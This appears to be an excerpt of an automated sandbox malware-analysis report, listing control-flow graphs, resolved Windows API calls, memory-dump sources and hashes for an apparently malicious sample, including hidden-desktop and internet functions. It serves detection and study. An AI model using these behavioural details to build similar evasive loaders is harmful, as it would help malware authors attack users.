                                control_flow_graph 633 c966e0-c966e7 634 c966ed-c96af9 GetProcAddress * 43 633->634 635 c96afe-c96b92 LoadLibraryA * 8 633->635 634->635 636 c96c08-c96c0f 635->636 637 c96b94-c96c03 GetProcAddress * 5 635->637 638 c96cd2-c96cd9 636->638 639 c96c15-c96ccd GetProcAddress * 8 636->639 637->636 640 c96cdb-c96d4a GetProcAddress * 5 638->640 641 c96d4f-c96d56 638->641 639->638 640->641 642 c96de9-c96df0 641->642 643 c96d5c-c96de4 GetProcAddress * 6 641->643 644 c96f10-c96f17 642->644 645 c96df6-c96f0b GetProcAddress * 12 642->645 643->642 646 c96f19-c96f88 GetProcAddress * 5 644->646 647 c96f8d-c96f94 644->647 645->644 646->647 648 c96fc1-c96fc8 647->648 649 c96f96-c96fbc GetProcAddress * 2 647->649 650 c96fca-c96ff0 GetProcAddress * 2 648->650 651 c96ff5-c96ffc 648->651 649->648 650->651 652 c970ed-c970f4 651->652 653 c97002-c970e8 GetProcAddress * 10 651->653 654 c97152-c97159 652->654 655 c970f6-c9714d GetProcAddress * 4 652->655 653->652 656 c9715b-c97169 GetProcAddress 654->656 657 c9716e-c97175 654->657 655->654 656->657 658 c971d3 657->658 659 c97177-c971ce GetProcAddress * 4 657->659 659->658
                                APIs
                                • GetProcAddress.KERNEL32(77190000,017853E8), ref: 00C966F5
                                • GetProcAddress.KERNEL32(77190000,017854C8), ref: 00C9670D
                                • GetProcAddress.KERNEL32(77190000,01799050), ref: 00C96726
                                • GetProcAddress.KERNEL32(77190000,01798FD8), ref: 00C9673E
                                • GetProcAddress.KERNEL32(77190000,01799008), ref: 00C96756
                                • GetProcAddress.KERNEL32(77190000,0179D220), ref: 00C9676F
                                • GetProcAddress.KERNEL32(77190000,0178A5A0), ref: 00C96787
                                • GetProcAddress.KERNEL32(77190000,0179D160), ref: 00C9679F
                                • GetProcAddress.KERNEL32(77190000,0179D250), ref: 00C967B8
                                • GetProcAddress.KERNEL32(77190000,0179D208), ref: 00C967D0
                                • GetProcAddress.KERNEL32(77190000,0179D2B0), ref: 00C967E8
                                • GetProcAddress.KERNEL32(77190000,01785568), ref: 00C96801
                                • GetProcAddress.KERNEL32(77190000,017855A8), ref: 00C96819
                                • GetProcAddress.KERNEL32(77190000,01785628), ref: 00C96831
                                • GetProcAddress.KERNEL32(77190000,01785648), ref: 00C9684A
                                • GetProcAddress.KERNEL32(77190000,0179D1A8), ref: 00C96862
                                • GetProcAddress.KERNEL32(77190000,0179D418), ref: 00C9687A
                                • GetProcAddress.KERNEL32(77190000,0178A910), ref: 00C96893
                                • GetProcAddress.KERNEL32(77190000,01785668), ref: 00C968AB
                                • GetProcAddress.KERNEL32(77190000,0179D268), ref: 00C968C3
                                • GetProcAddress.KERNEL32(77190000,0179D388), ref: 00C968DC
                                • GetProcAddress.KERNEL32(77190000,0179D358), ref: 00C968F4
                                • GetProcAddress.KERNEL32(77190000,0179D280), ref: 00C9690C
                                • GetProcAddress.KERNEL32(77190000,01785688), ref: 00C96925
                                • GetProcAddress.KERNEL32(77190000,0179D298), ref: 00C9693D
                                • GetProcAddress.KERNEL32(77190000,0179D238), ref: 00C96955
                                • GetProcAddress.KERNEL32(77190000,0179D2C8), ref: 00C9696E
                                • GetProcAddress.KERNEL32(77190000,0179D340), ref: 00C96986
                                • GetProcAddress.KERNEL32(77190000,0179D2E0), ref: 00C9699E
                                • GetProcAddress.KERNEL32(77190000,0179D370), ref: 00C969B7
                                • GetProcAddress.KERNEL32(77190000,0179D1C0), ref: 00C969CF
                                • GetProcAddress.KERNEL32(77190000,0179D3A0), ref: 00C969E7
                                • GetProcAddress.KERNEL32(77190000,0179D1D8), ref: 00C96A00
                                • GetProcAddress.KERNEL32(77190000,0178FE98), ref: 00C96A18
                                • GetProcAddress.KERNEL32(77190000,0179D430), ref: 00C96A30
                                • GetProcAddress.KERNEL32(77190000,0179D190), ref: 00C96A49
                                • GetProcAddress.KERNEL32(77190000,017856A8), ref: 00C96A61
                                • GetProcAddress.KERNEL32(77190000,0179D3B8), ref: 00C96A79
                                • GetProcAddress.KERNEL32(77190000,01785728), ref: 00C96A92
                                • GetProcAddress.KERNEL32(77190000,0179D2F8), ref: 00C96AAA
                                • GetProcAddress.KERNEL32(77190000,0179D1F0), ref: 00C96AC2
                                • GetProcAddress.KERNEL32(77190000,01785388), ref: 00C96ADB
                                • GetProcAddress.KERNEL32(77190000,017853A8), ref: 00C96AF3
                                • LoadLibraryA.KERNEL32(0179D310,00C9051F), ref: 00C96B05
                                • LoadLibraryA.KERNEL32(0179D328), ref: 00C96B16
                                • LoadLibraryA.KERNEL32(0179D3E8), ref: 00C96B28
                                • LoadLibraryA.KERNEL32(0179D3D0), ref: 00C96B3A
                                • LoadLibraryA.KERNEL32(0179D400), ref: 00C96B4B
                                • LoadLibraryA.KERNEL32(0179D148), ref: 00C96B5D
                                • LoadLibraryA.KERNEL32(0179D178), ref: 00C96B6F
                                • LoadLibraryA.KERNEL32(0179D490), ref: 00C96B80
                                • GetProcAddress.KERNEL32(77040000,01785288), ref: 00C96B9C
                                • GetProcAddress.KERNEL32(77040000,0179D610), ref: 00C96BB4
                                • GetProcAddress.KERNEL32(77040000,01798C18), ref: 00C96BCD
                                • GetProcAddress.KERNEL32(77040000,0179D550), ref: 00C96BE5
                                • GetProcAddress.KERNEL32(77040000,01785028), ref: 00C96BFD
                                • GetProcAddress.KERNEL32(73D20000,0178A4B0), ref: 00C96C1D
                                • GetProcAddress.KERNEL32(73D20000,01785068), ref: 00C96C35
                                • GetProcAddress.KERNEL32(73D20000,0178A4D8), ref: 00C96C4E
                                • GetProcAddress.KERNEL32(73D20000,0179D628), ref: 00C96C66
                                • GetProcAddress.KERNEL32(73D20000,0179D658), ref: 00C96C7E
                                • GetProcAddress.KERNEL32(73D20000,01785088), ref: 00C96C97
                                • GetProcAddress.KERNEL32(73D20000,01785048), ref: 00C96CAF
                                • GetProcAddress.KERNEL32(73D20000,0179D670), ref: 00C96CC7
                                • GetProcAddress.KERNEL32(768D0000,017850A8), ref: 00C96CE3
                                • GetProcAddress.KERNEL32(768D0000,017850C8), ref: 00C96CFB
                                • GetProcAddress.KERNEL32(768D0000,0179D6E8), ref: 00C96D14
                                • GetProcAddress.KERNEL32(768D0000,0179D700), ref: 00C96D2C
                                • GetProcAddress.KERNEL32(768D0000,01785148), ref: 00C96D44
                                • GetProcAddress.KERNEL32(75790000,0178A6B8), ref: 00C96D64
                                • GetProcAddress.KERNEL32(75790000,0178A500), ref: 00C96D7C
                                • GetProcAddress.KERNEL32(75790000,0179D598), ref: 00C96D95
                                • GetProcAddress.KERNEL32(75790000,01785128), ref: 00C96DAD
                                • GetProcAddress.KERNEL32(75790000,01785308), ref: 00C96DC5
                                • GetProcAddress.KERNEL32(75790000,0178A550), ref: 00C96DDE
                                • GetProcAddress.KERNEL32(75A10000,0179D640), ref: 00C96DFE
                                • GetProcAddress.KERNEL32(75A10000,01785228), ref: 00C96E16
                                • GetProcAddress.KERNEL32(75A10000,01798C08), ref: 00C96E2F
                                • GetProcAddress.KERNEL32(75A10000,0179D730), ref: 00C96E47
                                • GetProcAddress.KERNEL32(75A10000,0179D5E0), ref: 00C96E5F
                                • GetProcAddress.KERNEL32(75A10000,01785248), ref: 00C96E78
                                • GetProcAddress.KERNEL32(75A10000,017850E8), ref: 00C96E90
                                • GetProcAddress.KERNEL32(75A10000,0179D688), ref: 00C96EA8
                                • GetProcAddress.KERNEL32(75A10000,0179D6B8), ref: 00C96EC1
                                • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 00C96ED7
                                • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 00C96EEE
                                • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 00C96F05
                                • GetProcAddress.KERNEL32(76850000,017852A8), ref: 00C96F21
                                • GetProcAddress.KERNEL32(76850000,0179D6A0), ref: 00C96F39
                                • GetProcAddress.KERNEL32(76850000,0179D4C0), ref: 00C96F52
                                • GetProcAddress.KERNEL32(76850000,0179D568), ref: 00C96F6A
                                • GetProcAddress.KERNEL32(76850000,0179D6D0), ref: 00C96F82
                                • GetProcAddress.KERNEL32(75690000,01785328), ref: 00C96F9E
                                • GetProcAddress.KERNEL32(75690000,01785168), ref: 00C96FB6
                                • GetProcAddress.KERNEL32(769C0000,017852E8), ref: 00C96FD2
                                • GetProcAddress.KERNEL32(769C0000,0179D718), ref: 00C96FEA
                                • GetProcAddress.KERNEL32(6F8C0000,017851A8), ref: 00C9700A
                                • GetProcAddress.KERNEL32(6F8C0000,01785348), ref: 00C97022
                                • GetProcAddress.KERNEL32(6F8C0000,01785268), ref: 00C9703B
                                • GetProcAddress.KERNEL32(6F8C0000,0179D4A8), ref: 00C97053
                                • GetProcAddress.KERNEL32(6F8C0000,01785108), ref: 00C9706B
                                • GetProcAddress.KERNEL32(6F8C0000,01784F88), ref: 00C97084
                                • GetProcAddress.KERNEL32(6F8C0000,01785188), ref: 00C9709C
                                • GetProcAddress.KERNEL32(6F8C0000,01784FC8), ref: 00C970B4
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00C970CB
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00C970E2
                                • GetProcAddress.KERNEL32(75D90000,0179D448), ref: 00C970FE
                                • GetProcAddress.KERNEL32(75D90000,01798BD8), ref: 00C97116
                                • GetProcAddress.KERNEL32(75D90000,0179D4D8), ref: 00C9712F
                                • GetProcAddress.KERNEL32(75D90000,0179D460), ref: 00C97147
                                • GetProcAddress.KERNEL32(76470000,017851C8), ref: 00C97163
                                • GetProcAddress.KERNEL32(6EC00000,0179D478), ref: 00C9717F
                                • GetProcAddress.KERNEL32(6EC00000,017851E8), ref: 00C97197
                                • GetProcAddress.KERNEL32(6EC00000,0179D4F0), ref: 00C971B0
                                • GetProcAddress.KERNEL32(6EC00000,0179D508), ref: 00C971C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 74892c18735753fdcb43d6898fb2bbd14031f75c92b40c83a4145ed5eee66897
                                • Instruction ID: 21983f21328265ff7e28e4cb9fa14bc6d87a28336acafa85663d2272139b10d2
                                • Opcode Fuzzy Hash: 74892c18735753fdcb43d6898fb2bbd14031f75c92b40c83a4145ed5eee66897
                                • Instruction Fuzzy Hash: A56263B9A512019FD754DF67EEC8A263BB9F78E3813108919E955E3361DB34B808DF20
                                Function 00C8F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C8F1D5
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F1F1
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C8F1FC
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F215
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C8F220
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F239
                                • lstrcpy.KERNEL32(00000000,00CA4FA0), ref: 00C8F25E
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F28C
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F2C0
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F2F0
                                • lstrlen.KERNEL32(01785468), ref: 00C8F315
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 2ea70e2dbab133ebbad39fe4ff881c645f09f2dd5d980f89ab1e110c0a9035c8
                                • Instruction ID: 9752edb1c154d631ddb255d32ed825b1046e0e5b6e5d589ac575e96882dbad16
                                • Opcode Fuzzy Hash: 2ea70e2dbab133ebbad39fe4ff881c645f09f2dd5d980f89ab1e110c0a9035c8
                                • Instruction Fuzzy Hash: 13A28670A012058FCB60EF69D948A5ABBF4EF49318F19807DE419E7362D731ED46CB54
                                Function 00C8FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C90013
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C900BD
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C900E1
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C900EC
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C90110
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C9011B
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C9013F
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C9015A
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C90189
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C90194
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C901C3
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C901CE
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C90206
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C90250
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C90288
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C9059B
                                • lstrlen.KERNEL32(017853C8), ref: 00C905AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C905D7
                                • lstrcat.KERNEL32(00000000,?), ref: 00C905E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C9060E
                                • lstrlen.KERNEL32(0179EDB0), ref: 00C90625
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C9064C
                                • lstrcat.KERNEL32(00000000,?), ref: 00C90658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C90681
                                • lstrlen.KERNEL32(01785548), ref: 00C90698
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C906C9
                                • lstrcat.KERNEL32(00000000,?), ref: 00C906D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C90706
                                • lstrcpy.KERNEL32(00000000,01798C68), ref: 00C9074B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C9077F
                                • lstrcpy.KERNEL32(00000000,0179EC78), ref: 00C907E7
                                • lstrcpy.KERNEL32(00000000,01798998), ref: 00C90858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 00C908CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C90928
                                • lstrcpy.KERNEL32(00000000,01798908), ref: 00C909F8
                                  • Part of subcall function 00C724E0: lstrcpy.KERNEL32(00000000,?), ref: 00C72528
                                  • Part of subcall function 00C724E0: lstrcpy.KERNEL32(00000000,?), ref: 00C7254E
                                  • Part of subcall function 00C724E0: lstrcpy.KERNEL32(00000000,?), ref: 00C72577
                                • lstrcpy.KERNEL32(00000000,01798948), ref: 00C90ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C90B81
                                • lstrcpy.KERNEL32(00000000,01798948), ref: 00C90D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 0db4523307382981b37458eb7c1f8ebc762dc42253d248350c8c7636c9f14dd9
                                • Instruction ID: 92cacf69175f08bb4a2057a999e38721a174a08a7220d2ebf845c2bbcf26f025
                                • Opcode Fuzzy Hash: 0db4523307382981b37458eb7c1f8ebc762dc42253d248350c8c7636c9f14dd9
                                • Instruction Fuzzy Hash: 9FE27B70A053418FDB34DF29C489B6ABBE0BF88314F59856DE89D8B262DB31D945CF42
                                Function 00C8F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(01785468), ref: 00C8F315
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8F3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8F3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8F47B
                                • lstrcpy.KERNEL32(00000000,01785468), ref: 00C8F4BB
                                • lstrcpy.KERNEL32(00000000,01798C38), ref: 00C8F4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8F59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C8F61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8F64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8F69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00C8F718
                                • lstrlen.KERNEL32(01798B48), ref: 00C8F746
                                • lstrcpy.KERNEL32(00000000,01798B48), ref: 00C8F771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8F793
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8F7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00C8FA32
                                • lstrlen.KERNEL32(01798BB8), ref: 00C8FA60
                                • lstrcpy.KERNEL32(00000000,01798BB8), ref: 00C8FA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8FAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8FAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: ad8514ec2c759c22703bf945d4639897a6d8964c08f6cb0b9459b079f362cf1d
                                • Instruction ID: ff49e33352005ef5a3824228d10f310b5cceff071663e45db8f2cae7c63ebfb1
                                • Opcode Fuzzy Hash: ad8514ec2c759c22703bf945d4639897a6d8964c08f6cb0b9459b079f362cf1d
                                • Instruction Fuzzy Hash: 66F15F30A01202CFDB24EF69C944A66B7E5BF49318B19C1BED819AB362D731ED47CB54
                                Function 00C88CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2721 c88ca0-c88cc4 StrCmpCA 2722 c88ccd-c88ce6 2721->2722 2723 c88cc6-c88cc7 ExitProcess 2721->2723 2725 c88cec-c88cf1 2722->2725 2726 c88ee2-c88eef call c72a20 2722->2726 2727 c88cf6-c88cf9 2725->2727 2729 c88cff 2727->2729 2730 c88ec3-c88edc 2727->2730 2732 c88e88-c88e9a lstrlen 2729->2732 2733 c88e6f-c88e7d StrCmpCA 2729->2733 2734 c88d84-c88d92 StrCmpCA 2729->2734 2735 c88da4-c88db8 StrCmpCA 2729->2735 2736 c88d06-c88d15 lstrlen 2729->2736 2737 c88d5a-c88d69 lstrlen 2729->2737 2738 c88dbd-c88dcb StrCmpCA 2729->2738 2739 c88ddd-c88deb StrCmpCA 2729->2739 2740 c88dfd-c88e0b StrCmpCA 2729->2740 2741 c88e1d-c88e2b StrCmpCA 2729->2741 2742 c88e3d-c88e4b StrCmpCA 2729->2742 2743 c88d30-c88d3f lstrlen 2729->2743 2744 c88e56-c88e64 StrCmpCA 2729->2744 2730->2726 2770 c88cf3 2730->2770 2752 c88e9c-c88ea1 call c72a20 2732->2752 2753 c88ea4-c88eb0 call c72930 2732->2753 2733->2730 2751 c88e7f-c88e86 2733->2751 2734->2730 2759 c88d98-c88d9f 2734->2759 2735->2730 2747 c88d1f-c88d2b call c72930 2736->2747 2748 c88d17-c88d1c call c72a20 2736->2748 2756 c88d6b-c88d70 call c72a20 2737->2756 2757 c88d73-c88d7f call c72930 2737->2757 2738->2730 2760 c88dd1-c88dd8 2738->2760 2739->2730 2761 c88df1-c88df8 2739->2761 2740->2730 2745 c88e11-c88e18 2740->2745 2741->2730 2746 c88e31-c88e38 2741->2746 2742->2730 2749 c88e4d-c88e54 2742->2749 2754 c88d49-c88d55 call c72930 2743->2754 2755 c88d41-c88d46 call c72a20 2743->2755 2744->2730 2750 c88e66-c88e6d 2744->2750 2745->2730 2746->2730 2779 c88eb3-c88eb5 2747->2779 2748->2747 2749->2730 2750->2730 2751->2730 2752->2753 2753->2779 2754->2779 2755->2754 2756->2757 2757->2779 2759->2730 2760->2730 2761->2730 2770->2727 2779->2730 2780 c88eb7-c88eb9 2779->2780 2780->2730 2781 c88ebb-c88ebd lstrcpy 2780->2781 2781->2730
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
